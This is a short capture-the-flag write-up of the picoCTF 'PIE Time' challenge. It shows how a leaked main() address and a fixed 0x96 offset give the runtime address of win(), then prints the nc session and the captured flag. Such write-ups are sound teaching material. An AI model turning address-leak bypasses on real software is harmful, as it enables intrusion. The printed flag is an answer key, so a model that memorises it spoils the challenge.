picoCTF - PIE TIME (Binary exploitation) - Writeup

I worked through the PIE Time picoCTF challenge, it’s a simple PIE exercise that teaches a useful trick. The binary is compiled as PIE (position-independent), so its functions are loaded at a randomized base each run. That sounds scary, but the program leaks the base address of main, making it straightforward.

What the program does

When you connect it prints something like:

Address of main: 0x5d4ab809e33d
Enter the address to jump to, ex => 0x12345:

So it gives you the runtime address of main, then asks for an address to jump to. If you can figure out where win() is relative to main(), you can compute win()’s runtime address and hand it to the program.

Static analysis

From the disassembly:

000000000000133d <main>
00000000000012a7 <win>

The difference is:

0x133d - 0x12a7 = 0x96

That 0x96 is a constant offset between the two functions inside the binary. PIE randomizes the load base, but not that distance.

How to exploit it

Server prints:

Address of main: 0x5d4ab809e33d

Compute:

0x5d4ab809e33d - 0x96 = 0x5d4ab809e2a7

Send that address back as your input. The program will call that address (which is win) and print the flag.

Example session I saw:

$ nc rescued-float.picoctf.net 59250
Address of main: 0x5d4ab809e33d
Enter the address to jump to, ex => 0x12345: 0x5D4AB809E2A7
You won!
picoCTF{b4s1c_p051t10n_1nd3p3nd3nc3_f8845f06}